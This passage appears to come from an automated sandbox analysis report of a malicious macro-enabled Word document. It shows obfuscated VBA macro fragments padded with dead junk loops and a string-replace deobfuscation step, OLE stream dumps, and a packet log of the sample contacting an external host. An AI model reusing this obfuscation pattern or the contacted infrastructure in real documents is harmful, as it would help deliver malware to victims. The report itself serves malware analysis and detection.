            If PVoxdBG(dxmcNDC) = 46 Or dxmcNDC = dxmcNDC Then
                dscc = "sasdsacc" & (gRLRHGC / 2) + 1 & " to " & (dxmcNDC / 2) + 1 & MidB$(PVoxdBG, gRLRHGC + 1, dxmcNDC - gRLRHGC + 3)
                gRLRHGC = dxmcNDC + 2
            End If
            dxmcNDC = dxmcNDC + 2
        Loop
    Next
cDhBGGFR:
Kfgztxaw46z = Z_yrt0419vs56rm
   GoTo IJmiCJ
Set KhPdASzO = RgCBRi
    Dim kkPsepvID, YuXlKu, WhXxZBCFx As Long
    Dim FYWwFXnmD As Word.Paragraph
    Dim AFprvHL() As Byte
    For Each FYWwFXnmD In Nre_13r__v1meabhr2.Paragraphs
        AFprvHL = FYWwFXnmD.Range
        dscc = "sadsaccc" & FYWwFXnmD.Range
        YuXlKu = UBound(AFprvHL) - 1
        kkPsepvID = 0
Set RvUuQGH = hBXXCY
        Do Until YuXlKu > YuXlKu
            If AFprvHL(YuXlKu) = 46 Or YuXlKu = YuXlKu Then
                dscc = "sasdsacc" & (kkPsepvID / 2) + 1 & " to " & (YuXlKu / 2) + 1 & MidB$(AFprvHL, kkPsepvID + 1, YuXlKu - kkPsepvID + 3)
                kkPsepvID = YuXlKu + 2
            End If
            YuXlKu = YuXlKu + 2
        Loop
    Next
IJmiCJ:
End Function
Function T0ljxv29dexr3v2yt(Qaleihvcbuiho33)
   GoTo KBiNIsVg
Set HrGdJP = nWxKMVOBG
    Dim mUryG, IQtMAu, iXqMIB As Long
    Dim ZQoRFxD As Word.Paragraph
    Dim ifLwTt() As Byte
    For Each ZQoRFxD In Nre_13r__v1meabhr2.Paragraphs
        ifLwTt = ZQoRFxD.Range
        dscc = "sadsaccc" & ZQoRFxD.Range
        IQtMAu = UBound(ifLwTt) - 1
        mUryG = 0
Set JWFlPMBdA = yXAkDJC
        Do Until IQtMAu > IQtMAu
            If ifLwTt(IQtMAu) = 46 Or IQtMAu = IQtMAu Then
                dscc = "sasdsacc" & (mUryG / 2) + 1 & " to " & (IQtMAu / 2) + 1 & MidB$(ifLwTt, mUryG + 1, IQtMAu - mUryG + 3)
                mUryG = IQtMAu + 2
            End If
            IQtMAu = IQtMAu + 2
        Loop
    Next
KBiNIsVg:
   GoTo sZNckH
Set fQjtHB = zOxiWIIb
    Dim GHdxC, bPtpAAz, beDixHFI As Long
    Dim yESSyEi As Word.Paragraph
    Dim yteeIh() As Byte
    For Each yESSyEi In Nre_13r__v1meabhr2.Paragraphs
        yteeIh = yESSyEi.Range
        dscc = "sadsaccc" & yESSyEi.Range
        bPtpAAz = UBound(yteeIh) - 1
        GHdxC = 0
Set XgCNAOJ = wjUEXtp
        Do Until bPtpAAz > bPtpAAz
            If yteeIh(bPtpAAz) = 46 Or bPtpAAz = bPtpAAz Then
                dscc = "sasdsacc" & (GHdxC / 2) + 1 & " to " & (bPtpAAz / 2) + 1 & MidB$(yteeIh, GHdxC + 1, bPtpAAz - GHdxC + 3)
                GHdxC = bPtpAAz + 2
            End If
            bPtpAAz = bPtpAAz + 2
        Loop
    Next
sZNckH:
   GoTo zAyhIWe
Set evivHCq = pXYQI
    Dim paWrAs, emKogsJt, DmEHG As Long
    Dim fufvMBxFB As Word.Paragraph
    Dim VXGInFA() As Byte
    For Each fufvMBxFB In Nre_13r__v1meabhr2.Paragraphs
        VXGInFA = fufvMBxFB.Range
        dscc = "sadsaccc" & fufvMBxFB.Range
        emKogsJt = UBound(VXGInFA) - 1
        paWrAs = 0
Set EQpkJ = VHaeE
        Do Until emKogsJt > emKogsJt
            If VXGInFA(emKogsJt) = 46 Or emKogsJt = emKogsJt Then
                dscc = "sasdsacc" & (paWrAs / 2) + 1 & " to " & (emKogsJt / 2) + 1 & MidB$(VXGInFA, paWrAs + 1, emKogsJt - paWrAs + 3)
                paWrAs = emKogsJt + 2
            End If
            emKogsJt = emKogsJt + 2
        Loop
    Next
zAyhIWe:
T0ljxv29dexr3v2yt = Replace(Qaleihvcbuiho33, "x [ sh b", Kyd2hcsqro5y2rxia)
   GoTo jfHHHlCG
Set FcSKHTIC = kUGXaZ
    Dim EJmBDY, foEzCEG, YwvvF As Long
    Dim HbTERWfG As Word.Paragraph
    Dim BwbBAFi() As Byte
    For Each HbTERWfG In Nre_13r__v1meabhr2.Paragraphs
        BwbBAFi = HbTERWfG.Range
        dscc = "sadsaccc" & HbTERWfG.Range
        foEzCEG = UBound(BwbBAFi) - 1
        EJmBDY = 0
Set zCOlH = mEsdJFB
        Do Until foEzCEG > foEzCEG
            If BwbBAFi(foEzCEG) = 46 Or foEzCEG = foEzCEG Then
                dscc = "sasdsacc" & (EJmBDY / 2) + 1 & " to " & (foEzCEG / 2) + 1 & MidB$(BwbBAFi, EJmBDY + 1, foEzCEG - EJmBDY + 3)
                EJmBDY = foEzCEG + 2
            End If
            foEzCEG = foEzCEG + 2
        Loop
    Next
jfHHHlCG:
   GoTo mhoxIuDG
Set nljDdEKC = WUTQAet
    Dim xUDGCFC, oNAXGHF, RnNWIqm As Long
    Dim VoGiD As Word.Paragraph
    Dim sRKFiF() As Byte
    For Each VoGiD In Nre_13r__v1meabhr2.Paragraphs
        sRKFiF = VoGiD.Range
        dscc = "sadsaccc" & VoGiD.Range
        oNAXGHF = UBound(sRKFiF) - 1
        xUDGCFC = 0
Set BMCxVes = YMyjEGOO
        Do Until oNAXGHF > oNAXGHF
            If sRKFiF(oNAXGHF) = 46 Or oNAXGHF = oNAXGHF Then
                dscc = "sasdsacc" & (xUDGCFC / 2) + 1 & " to " & (oNAXGHF / 2) + 1 & MidB$(sRKFiF, xUDGCFC + 1, oNAXGHF - xUDGCFC + 3)
                xUDGCFC = oNAXGHF + 2
            End If
            oNAXGHF = oNAXGHF + 2
        Loop
    Next
mhoxIuDG:
   GoTo YAMzFD
Set OkhnVlkx = eUaictZE
    Dim hUYqA, dkffwCHGW, oLCGmAiCG As Long
    Dim aMdIG As Word.Paragraph
    Dim VHywBeoD() As Byte
    For Each aMdIG In Nre_13r__v1meabhr2.Paragraphs
        VHywBeoD = aMdIG.Range
        dscc = "sadsaccc" & aMdIG.Range
        dkffwCHGW = UBound(VHywBeoD) - 1
        hUYqA = 0
Set sCAOEB = SuvbRJTD
        Do Until dkffwCHGW > dkffwCHGW
            If VHywBeoD(dkffwCHGW) = 46 Or dkffwCHGW = dkffwCHGW Then
                dscc = "sasdsacc" & (hUYqA / 2) + 1 & " to " & (dkffwCHGW / 2) + 1 & MidB$(VHywBeoD, hUYqA + 1, dkffwCHGW - hUYqA + 3)
                hUYqA = dkffwCHGW + 2
            End If
            dkffwCHGW = dkffwCHGW + 2
        Loop
    Next
YAMzFD:
End Function

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 146

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	146
Entropy:	4.00187355764
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.279952994103
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 552

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	552
Entropy:	4.11686047225
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 6847

General
Stream Path:	1Table
File Type:	data
Stream Size:	6847
Entropy:	6.03173557377
Base64 Encoded:	True
Data ASCII:	j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 516

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	516
Entropy:	5.47836240591
Base64 Encoded:	True
Data ASCII:	I D = " { 4 A 0 5 3 0 A 6 - D A 4 7 - 4 F D A - 9 2 B 3 - 4 1 B 1 D 5 0 9 B B D 4 } " . . D o c u m e n t = N r e _ 1 3 r _ _ v 1 m e a b h r 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T w w e j h 0 3 4 u 3 2 e b q . . M o d u l e = U v e d 9 u 3 2 0 l y e n . . E x e N a m e 3 2 = " U f f 6 s j 7 2 n x 3 9 8 f 7 v h u " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 2 0 0 E 7 6 2 6 A 6 6 6 A 6 6 6 A 6 6 6 A 6 6 "
Data Raw:	49 44 3d 22 7b 34 41 30 35 33 30 41 36 2d 44 41 34 37 2d 34 46 44 41 2d 39 32 42 33 2d 34 31 42 31 44 35 30 39 42 42 44 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4e 72 65 5f 31 33 72 5f 5f 76 31 6d 65 61 62 68 72 32 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 77 77 65 6a 68 30 33 34 75 33 32 65 62 71 0d 0a 4d 6f 64 75 6c 65 3d 55 76 65 64 39 75 33 32 30 6c 79 65

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	149
Entropy:	3.67538593101
Base64 Encoded:	False
Data ASCII:	N r e _ 1 3 r _ _ v 1 m e a b h r 2 . N . r . e . _ . 1 . 3 . r . _ . _ . v . 1 . m . e . a . b . h . r . 2 . . . T w w e j h 0 3 4 u 3 2 e b q . T . w . w . e . j . h . 0 . 3 . 4 . u . 3 . 2 . e . b . q . . . U v e d 9 u 3 2 0 l y e n . U . v . e . d . 9 . u . 3 . 2 . 0 . l . y . e . n . . . . .
Data Raw:	4e 72 65 5f 31 33 72 5f 5f 76 31 6d 65 61 62 68 72 32 00 4e 00 72 00 65 00 5f 00 31 00 33 00 72 00 5f 00 5f 00 76 00 31 00 6d 00 65 00 61 00 62 00 68 00 72 00 32 00 00 00 54 77 77 65 6a 68 30 33 34 75 33 32 65 62 71 00 54 00 77 00 77 00 65 00 6a 00 68 00 30 00 33 00 34 00 75 00 33 00 32 00 65 00 62 00 71 00 00 00 55 76 65 64 39 75 33 32 30 6c 79 65 6e 00 55 00 76 00 65 00 64 00 39

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6003

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	6003
Entropy:	5.68411443527
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: Tower32/800 68020 not stripped - version 18435, Stream Size: 676

General
Stream Path:	Macros/VBA/dir
File Type:	Tower32/800 68020 not stripped - version 18435
Stream Size:	676
Entropy:	6.39115166959
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . < . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
Data Raw:	01 a0 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 3c ff fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 112766

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	112766
Entropy:	7.32176415337
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . [ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 bd 5b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e b8 01 00 62 7f 00 00 62 7f 00 00 bd 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Stream Path: word, File Type: data, Stream Size: 1122

General
Stream Path:	word
File Type:	data
Stream Size:	1122
Entropy:	7.81126798031
Base64 Encoded:	False
Data ASCII:	. . $ . . 7 { . . O . . . : . L 6 d M f d 4 . . Z . . 8 . . . M . . / { y C K ) . G . . T . . . . . . . . . . . q : L _ B . 1 \| . . . . 0 . . . $ . . . . ^ . . . * . . 3 . . T S h . . . . { . z \| . . . . . . , . . . . T 5 . . 2 . . y . H G . . . . . . . Z , Y . a . . W . M . g . . . . . 3 . j . * c J . 4 B . ! T . Q B k J . < G . > . . . . . 6 . i / . . . . . M / . . 0 - . ) 6 ` 8 . $ A . . . . _ . . . @ . . . . . . > . . z . . . . - . . . . . . . . . X . 9 ` . 5 ! . [ . 1 N . . . . . . . $ b # x . T . .
Data Raw:	10 ea 24 95 1f 37 7b 80 e5 4f 18 ac fd 3a ac 4c 36 64 4d 66 64 34 d7 b2 5a d2 d7 38 fb b4 d2 4d ad 07 2f 7b 79 43 4b 29 be 47 ac f8 54 be b8 17 0d ef 20 9f c9 bb b2 dc 13 71 3a 4c 5f 42 84 31 7c ca fe f6 0b 30 d3 f3 19 24 a8 1c 87 de 5e 9b 1a c0 2a 0b 94 33 83 f1 54 53 68 07 08 ff c9 7b c3 7a 7c 89 bf c2 0c dd 1c 2c 85 a5 13 95 54 35 13 9e 32 9e 18 79 9d 48 47 0d a1 b7 c8 cb ea 1a

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 25, 2021 11:20:43.706973076 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:43.852220058 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:43.852329016 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:43.855108976 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.002566099 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.005980968 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006011009 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006023884 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006046057 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006067038 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006088018 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006113052 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006129980 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006150961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006170988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006186008 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006186962 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.006206036 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006222963 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006226063 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.006242990 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.006243944 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006269932 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.006302118 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.147989988 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148052931 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148087978 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148104906 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148144007 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148183107 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148344994 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.148384094 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.148391008 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.148873091 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148929119 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148960114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.148986101 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149024963 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149025917 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149066925 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149091005 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149106026 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149143934 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149168968 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149174929 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149215937 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149246931 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149283886 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149286985 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149311066 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149348021 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149350882 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149425030 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149481058 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149496078 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149511099 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.149548054 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.149549961 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.150108099 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.150913000 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.150950909 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.150991917 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.151057959 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.151123047 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.291057110 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291121006 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291148901 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291186094 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291325092 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.291904926 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291934967 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291973114 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.291985989 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292011976 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292047024 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292059898 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292068005 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292103052 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292119026 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292129993 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292155981 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292170048 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292207956 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292232037 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292264938 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292484045 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292807102 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292831898 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292857885 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292896032 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292932034 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292958975 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.292969942 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.292984009 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.293009043 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293031931 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.293045044 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293060064 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.293087006 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293124914 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293148041 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.293847084 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293889046 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293925047 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.293937922 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.293987036 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.294394970 CET	49165	80	192.168.2.22	217.144.106.11
Jan 25, 2021 11:20:44.294814110 CET	80	49165	217.144.106.11	192.168.2.22
Jan 25, 2021 11:20:44.294846058 CET	80	49165	217.144.106.11	192.168.2.22
